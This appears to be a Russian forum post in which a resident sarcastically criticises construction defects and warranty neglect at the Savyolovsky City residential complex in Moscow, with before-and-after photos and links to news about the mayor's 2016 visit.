Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

А также того, как застройщик бережно относится к своим гарантийным обязательствам по ремонту дома сроком на три года.


Первое фото датировано апрелем, второе снято буквально вчера.

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост
Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

Замечу, что в 2016 стройку посетил лично мэр Москвы и благословил то, что нынче там творится.


http://www.metrium.ru/news/detail/mer-moskvy-sergey-sobyanin...


https://www.google.ru/amp/amp.vesti.ru/doc.html%3fid=2812978

Стриптизерский шест (дом) Москва, Строительство, Мэрия, Савеловский, Савеловский сити, Новостройка, Длиннопост

Этот ЖК - грандиозный успех. Вот жаль только не строительный  и социальный, а маркетинговый. Квартиры и апарты исправно покупаются. Деньги застройщику также исправно заносят.


Если пост наберёт плюсов, запилю историю, как застройщик навязал свою ручную УК, требует с жителей депозиты и пытается штрафовать за все подряд.


Комменты для минусов внутри.


З.Ы. Прошу прощения за качество некоторых фото. Снималось на тот самый шест.

Показать полностью 10
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: